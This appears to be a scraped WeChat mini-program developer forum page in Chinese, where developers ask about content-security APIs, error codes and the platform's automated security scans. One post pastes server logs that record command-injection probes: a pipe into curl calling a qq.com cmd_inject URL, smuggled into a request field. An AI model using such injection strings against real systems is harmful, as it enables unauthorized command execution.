安全中心
今天小程序文档内容安全部分已经找不到这个接口了,有知道的大佬帮忙解答下吗[图片]
小程序安全测试,是不是每次小程序发布就进行一次安全测试呀 ?
你好,目前我的小程序的后端使用了云开发,但是看公告下的评论,发现目前的安全测试实际上就是模拟攻击,这会导致大量的资源消耗 我想问一下,我使用云开发,在安全测试中消耗的云资源,怎么算?
https://developers.weixin.qq.com/miniprogram/dev/api-backend/open-api/safety-control-capability/riskControl.getUserRiskRank.html 接口一直返回 {"errcode":61010,"errmsg":"code is expired rid: 61a5977a-1f84f61d-0e3abfbb"} 已经让前端登录过小程序,也授权了。
[图片][图片][图片]
公告原地址:https://developers.weixin.qq.com/community/minihome/doc/000888650540f06814dcd77db5b401?page=3#comment-list 对于官方最近发布的安全测试,就官网所说的目的【提高安全性】和【用户体验】就这两个目前来说,做为小程序的开发和运营者,我是非常支持的。 但是从实际操作的方面来看,结果让人很诧异。 首先,什么时候做这种安全测试,是否得先告知我们开发运营人员,以便有相应的时间安排。 其次,做完了测试之后是否得有相应的结果、建议等友好的沟通渠道。 目前这样毫无沟通、毫无预警的处理方式,说好听是安全测试,很容易被误会为非法攻击
使用了2.0 内容文字审核的接口 文字为 “拜托你在想什么😂 就是本来打打闹闹,突然开始互拍沙雕日常而已啦” 被判为 suggest: risky label: 20003 (辱骂) traceId: 619f7954-4f3ebb5a-0e0ddd89
Tencent Security Team, more information: https://mmbizurl.cn/s/im017feex dbc8" "106.55.202.118",一直在请求,服务器都干崩溃了
const cloud = require('wx-server-sdk') cloud.init() // 云函数入口函数 exports.main = async (event, context) => { const wxContext = cloud.getWXContext() try { const result = await cloud.openapi.security.msgSecCheck({ content: event.text }) if (result && result.errCode.toString() === '87014'){ return { code: 500, msg: '内容含有违法违规内容', data: result } }else{ return { code: 200, msg: 'ok', data: result } } } catch (err) { // 错误处理 if (err.errCode.toString() === '87014') { return { code: 500, msg: '内容含有违法违规内容', data: err } } return { code: 502, msg: '调用security接口异常', data: err } } } js代码 wx.cloud.callFunction({ name: 'contentcheck', data: { text: "台湾台独" } }).then((res) => { if (res.result.code == "200") { //检测通过 console.log('监测通过') } else { //执行不通过 wx.showToast({ title: '包含敏感字哦。', icon: 'none', duration: 3000 }) } }) 官方帮忙看一下问题出在了哪里。。。急急急
小程序内有实时语音场景,需要接入安全内容2.0吗?
你好,你的小程序【上传图片、文字】功能在进行内容安全验证时,存在信息安全风险,请尽快完善内容机制:1、确保已接入内容安全API并要求所调用API可在小程序内任意发布的场景生效;2、小程序内检测结果安全说明仅需提示用户所发布内容含违规信息即可; 接口调用可参考:https://developers.weixin.qq.com/miniprogram/dev/api-backend/open-api/sec-check/security.msgSecCheck.html --------- 小程序:115个人 只有上传文件功能,没有发文章功能,用哪个接口?
是不是每次我们提交小程序审核后,你们都会去扫描我们的接口。还是只是第一次提交审核的时候会帮我们做一下安全检测 可能由于我们服务器的配置和代码不够美丽,真心的扛不住你们的扫描。
我不管用什么词汇全是pass,多难听的词汇全是pass,涉政、台独也不拦截,想问个测试用例,不能说2.0了连测试用例也不给了啊
看了官方的请求ip是固定几个,但是我这里请求过来的是三个网段的,81网段 172 网段49 网段的, 并不是官方说的几个ip。 这几天发现一直在请求,从早到晚,是被攻击了?流量又不是很大。。。 [图片]
服务端访问微信小程序提供的内容安全校验接口,很正常的图片,但是审核不通过。 图片地址:http://image.wayii.com/object_ios_0012_1636711890_0.png 微信返回的信息如下, 【请求地址】: https://api.weixin.qq.com/wxa/img_sec_check?access_token=50_HRcGabpamnxnDcbZjm7kokCJjS3NMoq-uzCljS0LkzfC1JZLM9WfQ-EqMEffUKuhBQA2RJGJGI2Z7nPWAeAHxaph8iIrCvpvamoY54Hhz77SnHTOQApcVFJP-U-_7DF4Tu-CYoD4SFCIMiXtZNHdADAFTN 【请求参数】:/tmp/1636711898272.tmp 【错误信息】:错误代码:40006, 错误信息:invalid media size rid: 618e3ddd-66c0fb3c-32b882ec,微信原始报文:{"errcode":40006,"errmsg":"invalid media size rid: 618e3ddd-66c0fb3c-32b882ec"} 2021-11-12 18:11:43.141 ERROR 8494 --- [ntContainer#1-1] c.w.t.b.d.s.impl.DiscernImageWXImpl : 微信接口异常:{} me.chanjar.weixin.common.error.WxErrorException: 错误代码:40006, 错误信息:invalid media size rid: 618e3ddd-66c0fb3c-32b882ec,微信原始报文:{"errcode":40006,"errmsg":"invalid media size rid: 618e3ddd-66c0fb3c-32b882ec"}
2021/11/10-18:58:44 org.rrdp.controller.keaidian.AppletsApiController- 用户是不是新人:["undefinedCUSTOMER_ID","true"]"|curl tst2.qq.com/cmd_inject/2b7f257873758cd372ddcddcf77a4f2c|" 2021/11/10-18:58:44 org.rrdp.util.JsonUtil- **********接口返回:{"result":"error","MESSAGE":"参数错误","state":"error"} 2021/11/10-18:58:44 org.rrdp.controller.keaidian.AppletsApiController- weiXinPayment ** 获取未领取优惠券 2021/11/10-18:58:44 org.rrdp.controller.keaidian.AppletsApiController- 用户是不是新人:["undefinedCUSTOMER_ID","true"]"|curl tst2.qq.com/cmd_inject/2b7f257873758cd372ddcddcf77a4f2c|" 2021/11/10-18:58:44 org.rrdp.util.JsonUtil- **********接口返回:{"result":"error","MESSAGE":"参数错误","state":"error"} 2021/11/10-18:58:44 org.rrdp.controller.keaidian.AppletsApiController- weiXinPayment ** 获取未领取优惠券 2021/11/10-18:58:44 org.rrdp.controller.keaidian.AppletsApiController- 用户是不是新人:"|curl tst2.qq.com/cmd_inject/2b7f257873758cd372ddcddcf77a4f2c|" 2021/11/10-18:58:44 org.rrdp.util.JsonUtil- **********接口返回:{"result":"error","MESSAGE":"参数错误","state":"error"} 2021/11/10-18:58:44 org.rrdp.controller.keaidian.AppletsApiController- weiXinPayment ** 获取未领取优惠券 2021/11/10-18:58:44 org.rrdp.controller.keaidian.AppletsApiController- 用户是不是新人:"|curl tst2.qq.com/cmd_inject/2b7f257873758cd372ddcddcf77a4f2c|" 2021/11/10-18:58:44 org.rrdp.util.JsonUtil- **********接口返回:{"result":"error","MESSAGE":"参数错误","state":"error"} 2021/11/10-18:58:44 org.rrdp.controller.keaidian.AppletsApiController- weiXinPayment ** 获取未领取优惠券 2021/11/10-18:58:44 org.rrdp.controller.keaidian.AppletsApiController- 用户是不是新人:["undefinedCUSTOMER_ID\"|curl tst2.qq.com/cmd_inject/8c034fdae5f9d2097a53fb54b88b790c|\"","true"] 2021/11/10-18:58:44 org.rrdp.util.JsonUtil- **********接口返回:{"result":"error","MESSAGE":"参数错误","state":"error"} 2021/11/10-18:58:45 org.rrdp.controller.keaidian.AppletsApiController- weiXinPayment ** 获取未领取优惠券 2021/11/10-18:58:45 org.rrdp.controller.keaidian.AppletsApiController- 用户是不是新人:["undefinedCUSTOMER_ID\"|curl tst2.qq.com/cmd_inject/8c034fdae5f9d2097a53fb54b88b790c|\"","true"] 2021/11/10-18:58:45 org.rrdp.util.JsonUtil- **********接口返回:{"result":"error","MESSAGE":"参数错误","state":"error"} 2021/11/10-18:58:45 org.rrdp.controller.keaidian.AppletsApiController- weiXinPayment ** 获取未领取优惠券 2021/11/10-18:58:45 org.rrdp.controller.keaidian.AppletsApiController- 用户是不是新人:["\"|curl tst2.qq.com/cmd_inject/8c034fdae5f9d2097a53fb54b88b790c|\"","true"] 2021/11/10-18:58:45 org.rrdp.util.JsonUtil- **********接口返回:{"result":"error","MESSAGE":"参数错误","state":"error"} 2021/11/10-18:58:45 org.rrdp.controller.keaidian.AppletsApiController- weiXinPayment ** 获取未领取优惠券 2021/11/10-18:58:45 org.rrdp.controller.keaidian.AppletsApiController- 用户是不是新人:["\"|curl tst2.qq.com/cmd_inject/8c034fdae5f9d2097a53fb54b88b790c|\"","true"] [图片] [图片] [图片] [图片]
看了官方给的安全检测接口只有文本、音频和图片没有看到有视频相关的安全解决方案,这个怎么办?
[图片] [图片] 我们用部分这些日期的会员数据,在后台“用户样本查询”里面去查询,反馈都是正常用户,因此这个100%的中风险,代表什么意义呢?
<200,{"errcode":87015,"errmsg":"query timeout, try a content with less size rid: 618b7bcd-1701ec96-048cc529"},[Connection:"keep-alive", Content-Type:"application/json; charset=UTF-8", Content-Length:"104"]> 图也不大啊,200来K。 时好时坏,有时候能检查过;还有就是传烧图根本检测不出来。
https://api.weixin.qq.com/wxa/msg_sec_check?access_token= 这个敏感词检测接口, 输入任何词(带敏感词)返回值都是 可以过, {\"errcode\":0,\"errmsg\":\"ok\",\"detail\":[{\"strategy\":\"keyword\",\"errcode\":0}, {\"strategy\":\"content_model\",\"errcode\":0,\"suggest\":\"pass\",\"label\":100,\"prob\":90}], \"trace_id\":\"61890660-7821931e-75ad18d1\",\"result\":{\"suggest\":\"pass\",\"label\":100}} 是什么原因。
你好,目前内容安全1.0接口已停止更新,建议使用内容安全2.0接口,后续我们将会对2.0接口进行相应的维护。